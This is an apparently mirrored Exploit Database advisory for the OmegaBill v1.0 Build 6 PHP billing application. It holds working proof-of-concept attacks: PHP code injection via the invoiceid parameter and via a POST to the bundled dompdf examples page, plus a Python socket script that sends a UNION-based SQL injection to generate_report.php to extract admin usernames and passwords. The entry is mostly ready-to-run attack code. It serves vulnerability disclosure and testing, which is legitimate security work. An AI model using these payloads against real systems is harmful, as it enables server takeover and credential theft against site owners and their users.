omegabill 1.0 build 6 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： AutoSec Tools
  日期： 2011-02-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16172/

• Source: http://packetstormsecurity.org/files/view/98480/OmegaBillv1.0Build6-php.txt
  
  ------------------------------------------------------------------------
  Software................OmegaBill v1.0 Build 6
  Vulnerability...........Arbitrary PHP Execution
  Download................http://sourceforge.net/projects/omegabill/
  Release Date............2/11/2011
  Tested On...............Windows Vista + XAMPP
  ------------------------------------------------------------------------
  Author..................AutoSec Tools
  Site....................http://www.autosectools.com/
  ------------------------------------------------------------------------
  
  --PoC--
  
  Vulnerability 1:
  
  http://localhost/OmegaBill_v1.0_Build6/clients/download_invoice.php?invoiceid=<?php system("calc.exe"); ?>
  
  
  Vulnerability 2:
  
  POST http://localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1
  Host: localhost
  Connection: keep-alive
  User-Agent: x
  Content-Length: 93
  Cache-Control: max-age=0
  Origin: null
  Content-Type: multipart/form-data; boundary=----x
  Accept: text/html
  Accept-Language: en-US,en;q=0.8
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
  
  ------x
  Content-Disposition: form-data; name="html"
  
  <?php system("calc.exe"); ?>
  ------x--
  
  SQL Injection:
  
  # ------------------------------------------------------------------------
  # Software................OmegaBill v1.0 Build 6
  # Vulnerability...........Authentication Bypass/SQL Injection
  # Download................http://sourceforge.net/projects/omegabill/
  # Release Date............2/11/2011
  # Tested On...............Windows Vista + XAMPP
  # ------------------------------------------------------------------------
  # Author..................AutoSec Tools
  # Site....................http://www.autosectools.com/
  # ------------------------------------------------------------------------
  # 
  # --Description--
  # 
  # An authentication bypass/SQL injection vulnerability in OmegaBill v1.0
  # Build 6 can be exploited to retreive a list of usernames and passwords.
  # 
  # 
  # --PoC--
  import socket
  
  host = 'localhost'
  path = '/omegabill_v1.0_build6'
  
  port = 80
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.settimeout(8)
  
  s.send('POST ' + path + '/generate_report.php HTTP/1.1\r\n'
   'Host: localhost\r\n'
   'Connection: keep-alive\r\n'
   'User-Agent: x\r\n'
   'Content-Length: 239\r\n'
   'Cache-Control: max-age=0\r\n'
   'Origin: null\r\n'
   'Content-Type: multipart/form-data; boundary=----x\r\n'
   'Accept: text/html\r\n'
   'Accept-Language: en-US,en;q=0.8\r\n'
   'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
   '\r\n'
   '------x\r\n'
   'Content-Disposition: form-data; name="startdate"\r\n'
   '\r\n'
   '\'OR 1 = 1 UNION ALL SELECT CONCAT(username,\':\',password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM admins;#\r\n'
   '------x\r\n'
   'Content-Disposition: form-data; name="enddate"\r\n'
   '\r\n'
   '\r\n'
   '------x--\r\n'
   '\r\n')
  
  print s.recv(8192)